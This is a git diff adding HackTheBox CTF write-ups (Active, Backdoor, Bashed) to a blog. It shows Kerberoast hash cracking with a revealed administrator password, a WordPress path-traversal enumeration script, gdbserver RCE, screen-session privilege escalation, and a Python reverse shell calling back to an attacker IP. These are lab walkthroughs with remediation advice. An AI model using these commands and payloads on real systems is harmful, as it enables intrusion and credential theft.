+┌──(d3vyce㉿kali)-[~] +└─$ cat output.txt +$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b8d16f6a494a6a06a7954e6a89f01ae1$2c1fc9a4a13479b7c31b2f76a8d6e9b05d97f7c6557848ad2d87960e7c89104568eb3f0ec8eedb7ab3636cca2209ed5b1582c14da207c6dab05f8ef6fce1047075d6d5edf2386f87e85576d90c9cfbac94044dceab2a4dc70c2751b7d353927781444a3e852b0bd795ca6975fb95c55fa8a49787bcb4ab0e02beee3edcb9df5d5fe53600aa0d0da1b22aae42649eedfff67ee00a2464a3fcbdef110cbf8eadce8f715fe620b5580154442099ad3771ec32c585c72a9e2f7d58d43f7344844d3b17a3cbc4b3c143af7d86343c51d945edc429fce49ee91c90dce2cad6bd4f17f6d210ce8055f49d69cee83aeca19f43cf465c6ab4b1d9c7bc575ef95a43aa235aa8adda00f65db41895396cf4727a05b367e779d126a06ca0d3319e6ff06cc127bf95d833ee54158ce905a1fd0e3b4de2e20e31a336fd6d5f0bf2b67660ddfc22106773a069f63c4d5ffa7c0178123a68b0b63a937df8783e2fd581f61539958aea7493035b8dbabfbf2775e70fd67440df8f9bc07d47d172d87ad717c8a27e752317e4d21ce2a3f403bfa6e6574ab10895d4d4cecb4f4feb1e1c718ce7b9c338a5ca5749374af941665174ff4246aed685b3d095b45f916accaf0a17656b4115d62d60dbb684eecec1235ea79645b12d957897c55c0f21c650ca9cc257bfaaa9ffef0b60edf265f9456a0db411e40e6b4ece00e6a143b40a5de5c833e5cb9708040e0f56b341bdc2ddc2ea1acf38b966d0583a027709c744a03fa600d9d943b3d7ffe9de5f591ac5ad7cd6158a918b99d6b15155099428a441f2984e6f82d2bbb1e5dc16c77ef6cc3604275e93d76d63fe2465331146c8358cf1a95413c502bd02a070c1caad48287720364005117067d5b04a4dc4ae3220443c400a4f4083b9110cb20783e5bf3412dcfbaff12e82f282b7749c412a4d52513814da147f0a40ad058f49c0216e980436af8455f6b1cecd4e6ace6877baf640fb8fadb3e92177343581aa96fbab2901b9226407273ab8568c1a2c7600493b741b809f817aa18d521f5cda1571461b67159a46272f51160f5790fa919019b8facbb70777f948654d895284992c0db9da7b87df843324fc43165c63d504f78b770f2612b9c88c598bc1dbd80d593f738d965b5593cd25fc41a53e1bf9f8095e99ef84aeac8c7426ba36af8aa036dac6440cb2412d5c0c7b626630931f0aee1b0dd469bc94f17f5ebed590bed26c6865916d0213d9f411723b4efb09f3f0d5043036 +``` +Bingo, the command finds the hash of the administrator of the machine, now we can perform a dictionary attack locally using john. To do this I use the following command: + + +```bash +john output.txt --wordlist=Documents/wordlist/rockyou.txt +``` +![](img/image-9.webp) + +After a few seconds, John gives me the password for the administrator account: `Ticketmaster1968`. + +I can verify that the credentials work well with `smbmap` : + +![](img/image-10.webp) + +Then I can create a reverse shell with `psexec`: + +![](img/image-11.webp) + +I now have a shell as `NT authority` authority and I can get the last flag. + + +```bash +C:\Users\Administrator\Desktop> more root.txt +7255a7f4f435814c28a5e8b51aabb4b4 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave the `Policies` file accessible to everyone +- Disable SMB anonymous access +- Use a strong password for the administrator account diff --git a/content/writeup-ctf/writeup-backdoor-htb/featured.png b/content/writeup-ctf/writeup-backdoor-htb/featured.png new file mode 100644 index 0000000..38f3539 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9483ec3250f81cd7446feb84946ad4ffd3371bdc18f53912e93d4a61ed94d44f +size 272821 diff --git a/content/writeup-ctf/writeup-backdoor-htb/featured.webp b/content/writeup-ctf/writeup-backdoor-htb/featured.webp new file mode 100644 index 0000000..c6d2af1 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30a7d8ba038a5f5bb70fa58841e7726ae34ee8c9aa8357ba0d5615dc842d4ea8 +size 28208 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png new file mode 100644 index 0000000..49ce4d3 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c5aa8af5883edee76b64d05ba2cfcca4da106ea380ce1f6d2308d07902a367a +size 56775 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp new file mode 100644 index 0000000..d0f03d7 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85f74302b41a28bcf7e402d095f54e2c9fd7183baf22ac274467feb6be4d7c7c +size 48384 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png new file mode 100644 index 0000000..85aa185 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d43e9faeca3ccfb3a91dc50dfe6bc121c2fe96d0675c34bb4b853446153f7ad +size 9895 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp new file mode 100644 index 0000000..1960dcb --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b2ddd8cb93b8ddb36fd008a604c028e5bb759727201864e5b83f1b66df653d4 +size 9900 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png new file mode 100644 index 0000000..49af0c1 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07134837cc71acedc53c90b683b51b33176ebc85f0bc86ef7d38a5cc762cb623 +size 2036061 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp new file mode 100644 index 0000000..474f32c --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ad0aad85154cb60547830e8d24e280ad77d7dd624c7dda828af0cc29b22fcc3 +size 152582 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png new file mode 100644 index 0000000..e97971c --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d45350c57229a71c041f40e3a0a21832661822851220dbdda3632fde906c8c73 +size 146806 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp new file mode 100644 index 0000000..a80a1d4 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:717b6822852b51a184b64cbb1c7a67bbe8a61e6e4503421ca54ce5189937b0e5 +size 150728 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png new file mode 100644 index 0000000..e7957cb --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ddff5fa5f65ccd4404856850f96e759f49fd5012e2c32ad1d06594260427fd9d +size 86402 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp new file mode 100644 index 0000000..cc960d4 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f53bba5f10f440209eee17cf1ee4e79d975f1123fbbb36af957ebc5035e1e36d +size 80172 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png new file mode 100644 index 0000000..4223052 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7f3f9ed46a6989ff6e93c5795e090f24bde5e8427c3c8424de1f0da3c3cfe51 +size 30137 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp new file mode 100644 index 0000000..0d542bd --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:262a1468e81157c2352d3bd33be91295f11b0e1d359f89c699b2787cf3effe6b +size 37318 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png new file mode 100644 index 0000000..dfd9cbd --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1171d8f76c5b913ce1cdeb8c11a835d44aa6608832f4e192dd1cf327b48c236d +size 104224 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp new file mode 100644 index 0000000..10b1ebc --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c59d8bfcbb7cb9d907d005c1a33194bcde4472f9113cc127b232b15f3d09575e +size 79692 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png new file mode 100644 index 0000000..a07d9a9 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c509f4303696d0da7ce6c16762b9197aabdbf54b2c14b6c361ff2d6dedf4c711 +size 30680 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp new file mode 100644 index 0000000..e2b5720 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4bf7d1bb84a822afb796215fb1409b3215a055b2515d65e83a8ea3f9211928be +size 24924 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png new file mode 100644 index 0000000..9e2bd6a --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0de7b3f0e58bf9b90c07313c52a9047cdb227fdffc1f7f8ec998fd0bcc99c1ea +size 48003 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp new file mode 100644 index 0000000..3f1386f --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:83c50c838c20c98a7f4acb45f3fc7390008376bcdbe4c9a9a27baed7c4649de4 +size 36036 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png new file mode 100644 index 0000000..4a53918 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:649d76ec676c949ee8137ec7a4e0ac6aa15f9b21520552854c91b51e0b8c0453 +size 33156 diff --git a/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp new file mode 100644 index 0000000..f046d16 --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:927ea2b85bb1fce53605558c06b992f7bdcef7ce1adfb86e7ffb484e9039a3a8 +size 31010 diff --git a/content/writeup-ctf/writeup-backdoor-htb/index.md b/content/writeup-ctf/writeup-backdoor-htb/index.md new file mode 100644 index 0000000..87f13be --- /dev/null +++ b/content/writeup-ctf/writeup-backdoor-htb/index.md @@ -0,0 +1,128 @@ +--- +title: "Writeup - Backdoor (HTB)" +date: 2022-04-19 +slug: "writeup-backdoor-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Backdoor](https://app.hackthebox.com/machines/Backdoor) machine from the HackTheBox site. + +# Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.125 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : web server (Apache 2.4.41) +- 1337/tcp : ????? + +We have a site on port 80 and port 1337 that hosts an unknown service at the moment; let's see what the site looks like. + +![](img/image-2.webp) + +# Exploit + +After inspecting the page, I notice that it is a site based on the CMS Wordpress, let's do a scan with "WPScan" to try to identify flaws: + +![](img/image-3.webp) + +Nothing special, let's try to do an aggressive detection of the plugins. For this I use the following command: + + +```bash +wpscan --url http://backdoor.htb --plugin-detection aggressive +``` +![](img/image-4.webp) + +There are two plugins: akismet and ebook-download. After some research I find that ebook-download in version 1.1 is exploitable (CVE-. + +So we create a script to automate the process scan, if the page returns a message with a size greater than 82 bytes, then the process exists. + + +```bash +import requests + +for i in range(0,1000): + url = "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc> + answer=requests.get(url) + lg=len(answer.text) + if(leng>82): + if '1337' in resp.text: + print("%d %s ",lg, answer.text) +``` +After running the script, we find 2 services: + +![](img/image-5.webp) + +These processes are gdbserver running on our mystery port: 1337. So we can now look for exploits related to this process. + +Je trouve rapidement le script suivant qui permet d'exécuter du code à distance via le service GDB : + +[GNU gdbserver 9.2 - Remote Command Execution (RCE)](https://www.exploit-db.com/exploits/50539) + +After generating a payload with msfvenom, I run the script : + +![](img/image-6.webp) + +I now have a shell on the remote machine, I can get the first flag. + +![](img/image-7.webp) + +# Privilege escalation + +First I try to find the SUID files. For that I use the following command: + + +```bash +find / -perm -u=s -type f 2>/dev/null +``` +![](img/image-8.webp) + +There are a lot of usual commands. But among the list there is "screen".  It is a command that allows to manage several terminals at the same time. I look then if a process runs with this command: + +![](img/image-9.webp) + +And indeed there is a process running. But not just any process, a root shell with the options -dmS : + +- -d : detache de screen when started +- -m : ignore the $STY environment variable, creation of a new session is enforced +- -S : When creating a new session, this option can be used to specify a meaningful name + +So we know that a screen named root has been created with the user root. If we manage to connect to the screen, we will have access to a root shell. + +To connect to the detached screen we need to use the following command: + + +```bash +screen -x [name]/[user] +``` +But before connecting we will have to define the variable $TERM, to do this I use the following command: + + +```bash +export TERM=screen +``` +I can now connect to the root screen with the following command: + + +```bash +screen -x root/root +``` +I now have access to a root shell and can retrieve the last flag. + +![](img/image-10.webp) + +# Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update Wordpress plugin +- Update GDB server +- Do not run screen as root with the -m variable diff --git a/content/writeup-ctf/writeup-bashed-htb/featured.png b/content/writeup-ctf/writeup-bashed-htb/featured.png new file mode 100644 index 0000000..c376fff --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c885dac12265794e61597ad5cccdc71290e72c4411a869cd0bae02c592daaa26 +size 209998 diff --git a/content/writeup-ctf/writeup-bashed-htb/featured.webp b/content/writeup-ctf/writeup-bashed-htb/featured.webp new file mode 100644 index 0000000..e0dfd56 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40ee22924a04bc9256a7ddb973cabbdc73b93a4140b63b8f61283e998f7a8140 +size 24012 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-1.png b/content/writeup-ctf/writeup-bashed-htb/img/image-1.png new file mode 100644 index 0000000..4074bcb --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7e4299b3286c7d1023c4ebec9529523d09b95bfe15daa14008df708a221ec10 +size 29417 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp new file mode 100644 index 0000000..0e8c342 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:679e2efd5944711888b8b836115234b3eef08d2a9ba3a715d7d67ad988e639a7 +size 25806 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-10.png b/content/writeup-ctf/writeup-bashed-htb/img/image-10.png new file mode 100644 index 0000000..7a4da76 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df8ea553145fed1014c2c5cbb69d2044f16a427186865e1a83313ec4aa690c88 +size 17704 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp new file mode 100644 index 0000000..718367a --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a24d54e59816131e08eafc8baf0a96f699c674315b8698c62dcc55c7fb8b1c72 +size 18092 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-2.png b/content/writeup-ctf/writeup-bashed-htb/img/image-2.png new file mode 100644 index 0000000..223a299 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b614006e6eee8a20d667654b0e8fe086258f5b1d5595a4bfc4167408146a3ff +size 546813 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp new file mode 100644 index 0000000..1147b1c --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02fc7f9f55a308748a7dd0923385654cc2fa86ad7bd5927b778e1317924b7ee2 +size 114226 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-3.png b/content/writeup-ctf/writeup-bashed-htb/img/image-3.png new file mode 100644 index 0000000..1bfc513 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14c12ee813d91a0250ab07cefeeb479251ace83a46b6dbf3b940349af7084e24 +size 75656 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp new file mode 100644 index 0000000..7815f6d --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72ed25b5f9bd29bf17a61f5bfc5e1a53d11594adb8af0776d7682ccaf6bc53b8 +size 66764 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-4.png b/content/writeup-ctf/writeup-bashed-htb/img/image-4.png new file mode 100644 index 0000000..1714b8c --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b53a592973802bbeed1f44489f0fbba7d9a851677ebab56475f88633efc2f950 +size 21623 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp new file mode 100644 index 0000000..950bf6a --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8794cb6ecaac097ef1ab3a09e0b5916972f9b3d5d704d26dd0f4a1835aed71a9 +size 18556 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-5.png b/content/writeup-ctf/writeup-bashed-htb/img/image-5.png new file mode 100644 index 0000000..f720541 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38c14c80e5c3eac15a6c516dcb8b95fe4e08ed9834538fbe336cea80993a2ad7 +size 32711 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp new file mode 100644 index 0000000..b9e2101 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67fa9e1d0cf8d1c4577fd1dd41655075c0cc5cbd8b05d821c3a43d8d90644e47 +size 28388 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-6.png b/content/writeup-ctf/writeup-bashed-htb/img/image-6.png new file mode 100644 index 0000000..ad6b159 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79c02e08c4ecd571b5137f4d3cdbfe68a746128c26eb1ad63c64f16113601fc4 +size 39356 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp new file mode 100644 index 0000000..2bd96d1 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fd9784c9d7b0e811ccf8436b32ef4cb93b5d1c93fec1cec96265913f142e5fb3 +size 31284 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-7.png b/content/writeup-ctf/writeup-bashed-htb/img/image-7.png new file mode 100644 index 0000000..ffdd7a7 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfff9e8731e784217e86c5b269c82bc2254ca034e62c37fd5388e7f60f776e45 +size 33947 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp new file mode 100644 index 0000000..e1d3453 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5d4856b5e81537e201c5bd291bde90c72d3e32b90a864b90818c67c9415df18 +size 27980 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-8.png b/content/writeup-ctf/writeup-bashed-htb/img/image-8.png new file mode 100644 index 0000000..8c3085a --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88735f9e0a7e9c79da63c8187f08e21077e8bad50a6b52a5d0537cb7f6b0037e +size 17536 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp new file mode 100644 index 0000000..651fcf0 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ca27b09f87fc7716808496b8d8448651df8ed9b6caba17d2b900860c31d7fd2 +size 16878 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-9.png b/content/writeup-ctf/writeup-bashed-htb/img/image-9.png new file mode 100644 index 0000000..37842a6 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3316643536bd23c6afa9046aa8bb746cbd77d8d5946aa84b3ced089c1fa16aee +size 12076 diff --git a/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp b/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp new file mode 100644 index 0000000..0030007 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:29d580ddc6c7eb025258b9e913bb315e155fb631a8879fbd35eaf8cc42cb2dae +size 19572 diff --git a/content/writeup-ctf/writeup-bashed-htb/index.md b/content/writeup-ctf/writeup-bashed-htb/index.md new file mode 100644 index 0000000..75050b1 --- /dev/null +++ b/content/writeup-ctf/writeup-bashed-htb/index.md @@ -0,0 +1,88 @@ +--- +title: "Writeup - Bashed (HTB)" +date: 2022-05-03 +slug: "writeup-bashed-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Bashed](https://app.hackthebox.com/machines/Bashed) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.10.68 +``` +One TCP port are discovered: + +![](img/image-1.webp) + +- 80/tcp : HTTP web server (Apache 2.4.18) + +![](img/image-2.webp) + +## Exploit + +First, I start by scanning the site's folders. + +![](img/image-3.webp) + +Quite a few things and in particular the `/dev` folder which contains the 2 following files: + +![](img/image-4.webp) + +After some research they correspond to the following project: [phpbash](https://github.com/Arrexel/phpbash). Globally it is a cmd directly integrated in a web page. So I go to the page and start to look if there are interesting things: + +![](img/image-5.webp) + +Rather fast, we can already get the first flag! + +## Privilege escalation + +Although functional, the cmd in the browser remains limited. So I upload a PHP reverse shell in the `html/uploads` folder. + +![](img/image-6.webp) + +I now have a reverse and I can check the sudo permissions of my user. + +![](img/image-7.webp) + +![](img/image-8.webp) + +So he has the authorization to execute any command as `scriptmanager`. So I search for files/scripts on the machine and find the `/scripts`. I check the permissions with the following command: + +![](img/image-9.webp) + +Looking at the content of the script I realize that there is an automatic execution of the script by the root user. Indeed the file `test.txt` belongs to root and was created a short time ago. + + +```bash +f = open("test.txt", "w") +f.write("testing 123!") +f.close +``` +So I modify the script with the following program: + + +```bash +import socket,subprocess,os +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +s.connect(("10.10.14.4",1234)) +os.dup2(s.fileno(),0) +os.dup2(s.fileno(),1) +os.dup2(s.fileno(),2) +t=subprocess.call(["/bin/sh","-i"]) +``` +After a few minutes, I have a reverse shell root and I can recover the last flag. + +![](img/image-10.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not run phpbash.php directly on the machine, use containers to isolate it for example +- Reduce the permissions of the user hosting the applications to a strict minimum +- Do not run a script automatically as root if it can be modified by other users diff --git a/content/writeup-ctf/writeup-biteme-thm/featured.png b/content/writeup-ctf/writeup-biteme-thm/featured.png new file mode 100644 index 0000000..0d3827d --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bcee2c64acb51cce96eb84f73a43b6a69067deda7bcf099d874f23f5b31a4ad9 +size 397543 diff --git a/content/writeup-ctf/writeup-biteme-thm/featured.webp b/content/writeup-ctf/writeup-biteme-thm/featured.webp new file mode 100644 index 0000000..1b00b88 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13d3bf4013cca3e7267d9506291331232d9432bfc552b4ed0588e4d4e0032f40 +size 321768 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-1.png b/content/writeup-ctf/writeup-biteme-thm/img/image-1.png new file mode 100644 index 0000000..a2fe741 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:54864448847abe460f53160ac41dd875500812a748e9569cae3150cf03144e21 +size 35817 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp b/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp new file mode 100644 index 0000000..2b1eb29 --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45979071648c84705bbe3ed9a8f822932d8669fd03bf101f5abc79bf081ec665 +size 34824 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-10.png b/content/writeup-ctf/writeup-biteme-thm/img/image-10.png new file mode 100644 index 0000000..381b22f --- /dev/null +++ b/content/writeup-ctf/writeup-biteme-thm/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:06be53934f4e7b6b1152fee7361efa109f3cadf9df42709ec2ddb7a83bb5b591 +size 19825 diff --git a/content/writeup-ctf/writeup-biteme-thm/img/image-10.webp 